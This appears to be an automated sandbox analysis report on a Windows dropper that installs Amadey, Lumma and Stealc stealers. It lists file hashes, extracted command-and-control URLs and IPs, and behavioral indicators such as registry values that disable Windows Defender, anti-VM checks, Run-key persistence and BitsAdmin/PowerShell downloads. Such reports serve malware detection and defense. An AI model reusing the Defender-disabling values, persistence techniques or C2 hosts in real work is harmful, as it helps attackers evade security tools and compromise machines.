Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-11-2024 19:38
Static task
static1
Behavioral task
behavioral1
Sample
d6035491e75ba4735911fddc6fdae0c49bd7646bf8a8aa0edade867ffe569500.exe
Resource
win10v2004-20241007-en
General
-
Target
d6035491e75ba4735911fddc6fdae0c49bd7646bf8a8aa0edade867ffe569500.exe
-
Size
7.1MB
-
MD5
e92d8ae791edd6cde50de8a57f521628
-
SHA1
0946dc675734d04541c570623996bd12bc332226
-
SHA256
d6035491e75ba4735911fddc6fdae0c49bd7646bf8a8aa0edade867ffe569500
-
SHA512
90246f30c2364e91e17b98ea7d4303fd85f6082b7e84c72612304adc318055a1b3ae646c8bd54255d1f32818b28765912c980e00eb653a371dfdec850c4765c4
-
SSDEEP
196608:27nvDIUt2aEE3s1deNOgwQrIuP/SgjVG+q7Wds8W++ottSH:iht2TVKN1w0IuyyG+qqnigtS
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://preside-comforter.sbs
https://savvy-steereo.sbs
https://copper-replace.sbs
https://record-envyp.sbs
https://slam-whipp.sbs
https://wrench-creter.sbs
https://looky-marked.sbs
https://plastic-mitten.sbs
https://hallowed-noisy.sbs
https://tail-cease.cyou
Extracted
stealc
drum
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://tail-cease.cyou/api
Signatures
-
Amadey family
-
Lumma family
-
Processes:
4I541V.exef7f273ba81.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 4I541V.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 4I541V.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" f7f273ba81.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" f7f273ba81.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" f7f273ba81.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 4I541V.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 4I541V.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 4I541V.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" f7f273ba81.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" f7f273ba81.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 4I541V.exe -
Stealc family
-
Enumerates VirtualBox registry keys 2 TTPs 2 IoCs
Processes:
f995b4d7bd.exef3c5ac255a.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF f995b4d7bd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF f3c5ac255a.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
Processes:
2S9414.exe4I541V.exeae1a903027.exe1u88t3.exeskotes.exe0a0f83ad13.exeskotes.exef7f273ba81.exef995b4d7bd.exef3c5ac255a.exeskotes.exe3u36Z.exe4c31b50e86.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2S9414.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4I541V.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ae1a903027.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1u88t3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0a0f83ad13.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f7f273ba81.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f995b4d7bd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f3c5ac255a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3u36Z.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4c31b50e86.exe -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid Process 264 6432 powershell.exe 270 6432 powershell.exe 274 6432 powershell.exe 277 6432 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid Process 7124 powershell.exe 5860 powershell.exe 7124 powershell.exe 5860 powershell.exe 6432 powershell.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
Processes:
bitsadmin.exebitsadmin.exepid Process 3576 bitsadmin.exe 2172 bitsadmin.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 26 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
ae1a903027.exeskotes.exe4I541V.exeskotes.exef995b4d7bd.exef3c5ac255a.exef7f273ba81.exe2S9414.exe3u36Z.exe4c31b50e86.exe0a0f83ad13.exe1u88t3.exeskotes.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ae1a903027.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4I541V.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f995b4d7bd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f3c5ac255a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f7f273ba81.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f3c5ac255a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2S9414.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3u36Z.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4c31b50e86.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0a0f83ad13.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1u88t3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4I541V.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4c31b50e86.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ae1a903027.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f7f273ba81.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f995b4d7bd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1u88t3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2S9414.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3u36Z.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0a0f83ad13.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
MSI5AE0.tmp1u88t3.exeskotes.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation MSI5AE0.tmp Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation 1u88t3.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation skotes.exe -
Drops startup file 1 IoCs
Processes:
msiexec.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemCare1.0.lnk msiexec.exe -
Executes dropped EXE 22 IoCs
Processes:
c5V11.exeQ3f32.exe1u88t3.exeskotes.exe2S9414.exe3u36Z.exe4I541V.exetvtC9D3.exeuxN4wDZ.exeuxN4wDZ.exeTcMBq5M.exe4c31b50e86.exe0a0f83ad13.exea3585e9f5b.exeskotes.exef7f273ba81.exef995b4d7bd.exef3c5ac255a.exeSystemCare1.0.exeMSI5AE0.tmpae1a903027.exeskotes.exepid Process 2316 c5V11.exe 4272 Q3f32.exe 2216 1u88t3.exe 4144 skotes.exe 1708 2S9414.exe 2008 3u36Z.exe 4844 4I541V.exe 3136 tvtC9D3.exe 3856 uxN4wDZ.exe 4136 uxN4wDZ.exe 3996 TcMBq5M.exe 1352 4c31b50e86.exe 2352 0a0f83ad13.exe 1700 a3585e9f5b.exe 3724 skotes.exe 3104 f7f273ba81.exe 6376 f995b4d7bd.exe 5768 f3c5ac255a.exe 6260 SystemCare1.0.exe 3104 MSI5AE0.tmp 5520 ae1a903027.exe 5304 skotes.exe -
Identifies Wine through registry keys 2 TTPs 13 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
1u88t3.exeskotes.exe4c31b50e86.exe0a0f83ad13.exef995b4d7bd.exef3c5ac255a.exeae1a903027.exeskotes.exe2S9414.exe3u36Z.exe4I541V.exeskotes.exef7f273ba81.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine 1u88t3.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine 4c31b50e86.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine 0a0f83ad13.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine f995b4d7bd.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine f3c5ac255a.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine ae1a903027.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine 2S9414.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine 3u36Z.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine 4I541V.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine f7f273ba81.exe -
Loads dropped DLL 23 IoCs
Processes:
tvtC9D3.exeMsiExec.exeMsiExec.exeSystemCare1.0.exepid Process 3136 tvtC9D3.exe 3136 tvtC9D3.exe 3136 tvtC9D3.exe 1224 MsiExec.exe 1224 MsiExec.exe 6864 MsiExec.exe 6864 MsiExec.exe 6864 MsiExec.exe 6864 MsiExec.exe 6864 MsiExec.exe 6864 MsiExec.exe 6864 MsiExec.exe 6260 SystemCare1.0.exe 6260 SystemCare1.0.exe 6260 SystemCare1.0.exe 6260 SystemCare1.0.exe 6260 SystemCare1.0.exe 6260 SystemCare1.0.exe 6260 SystemCare1.0.exe 6260 SystemCare1.0.exe 6260 SystemCare1.0.exe 6260 SystemCare1.0.exe 6260 SystemCare1.0.exe -
Processes:
4I541V.exef7f273ba81.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 4I541V.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" f7f273ba81.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 4I541V.exe -
Adds Run key to start application 2 TTPs 7 IoCs
Processes:
skotes.exed6035491e75ba4735911fddc6fdae0c49bd7646bf8a8aa0edade867ffe569500.exec5V11.exeQ3f32.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f7f273ba81.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009990001\\f7f273ba81.exe" skotes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" d6035491e75ba4735911fddc6fdae0c49bd7646bf8a8aa0edade867ffe569500.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" c5V11.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" Q3f32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4c31b50e86.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009987001\\4c31b50e86.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0a0f83ad13.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009988001\\0a0f83ad13.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a3585e9f5b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009989001\\a3585e9f5b.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exeTcMBq5M.exemsiexec.exedescription ioc Process File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: TcMBq5M.exe File opened (read-only) \??\U: TcMBq5M.exe File opened (read-only) \??\Y: TcMBq5M.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\E: TcMBq5M.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\R: TcMBq5M.exe File opened (read-only) \??\T: TcMBq5M.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\M: TcMBq5M.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\N: TcMBq5M.exe File opened (read-only) \??\O: TcMBq5M.exe File opened (read-only) \??\Z: TcMBq5M.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\B: TcMBq5M.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\J: TcMBq5M.exe File opened (read-only) \??\W: TcMBq5M.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\X: TcMBq5M.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\S: TcMBq5M.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\L: TcMBq5M.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\H: TcMBq5M.exe File opened (read-only) \??\I: TcMBq5M.exe File opened (read-only) \??\V: TcMBq5M.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\G: TcMBq5M.exe File opened (read-only) \??\K: TcMBq5M.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\G: msiexec.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral1/files/0x0007000000023c58-189.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
Processes:
1u88t3.exeskotes.exe2S9414.exe3u36Z.exe4I541V.exe4c31b50e86.exe0a0f83ad13.exeskotes.exef7f273ba81.exef995b4d7bd.exef3c5ac255a.exeae1a903027.exeskotes.exepid Process 2216 1u88t3.exe 4144 skotes.exe 1708 2S9414.exe 2008 3u36Z.exe 4844 4I541V.exe 1352 4c31b50e86.exe 2352 0a0f83ad13.exe 3724 skotes.exe 3104 f7f273ba81.exe 6376 f995b4d7bd.exe 5768 f3c5ac255a.exe 5520 ae1a903027.exe 5304 skotes.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
uxN4wDZ.exedescription pid Process procid_target PID 3856 set thread context of 4136 3856 uxN4wDZ.exe 115 -
Drops file in Windows directory 17 IoCs
Processes:
msiexec.exe1u88t3.exedescription ioc Process File created C:\Windows\Installer\e58f1ed.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIF770.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIF691.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB9.tmp msiexec.exe File opened for modification C:\Windows\Installer\e58f1ed.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIF613.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF6F0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF72F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF750.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06} msiexec.exe File opened for modification C:\Windows\Installer\MSIFF22.tmp msiexec.exe File created C:\Windows\Installer\e58f1f1.msi msiexec.exe File created C:\Windows\Tasks\skotes.job 1u88t3.exe File opened for modification C:\Windows\Installer\MSI5AE0.tmp msiexec.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target Process procid_target 5764 5520 WerFault.exe 178 -
System Location Discovery: System Language Discovery 1 TTPs 37 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
MsiExec.execmd.exeae1a903027.exeping.exeuxN4wDZ.exeTcMBq5M.exetaskkill.exepowershell.exeQ3f32.exe1u88t3.exe4c31b50e86.exef7f273ba81.exepowershell.exepowershell.exed6035491e75ba4735911fddc6fdae0c49bd7646bf8a8aa0edade867ffe569500.exe2S9414.exe4I541V.exetaskkill.exeskotes.exeuxN4wDZ.exebitsadmin.exe0a0f83ad13.exeMSI5AE0.tmp3u36Z.exetaskkill.exetaskkill.exef3c5ac255a.exea3585e9f5b.exetaskkill.exef995b4d7bd.exeSystemCare1.0.exec5V11.exebitsadmin.exeMsiExec.exemsiexec.exetvtC9D3.exeschtasks.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ae1a903027.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ping.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uxN4wDZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TcMBq5M.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Q3f32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1u88t3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4c31b50e86.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f7f273ba81.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d6035491e75ba4735911fddc6fdae0c49bd7646bf8a8aa0edade867ffe569500.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2S9414.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4I541V.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uxN4wDZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0a0f83ad13.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSI5AE0.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3u36Z.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3c5ac255a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a3585e9f5b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f995b4d7bd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SystemCare1.0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c5V11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tvtC9D3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vssvc.exedescription ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000f914d34881601a250000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000f914d3480000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900f914d348000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1df914d348000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000f914d34800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exefirefox.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Kills process with taskkill 5 IoCs
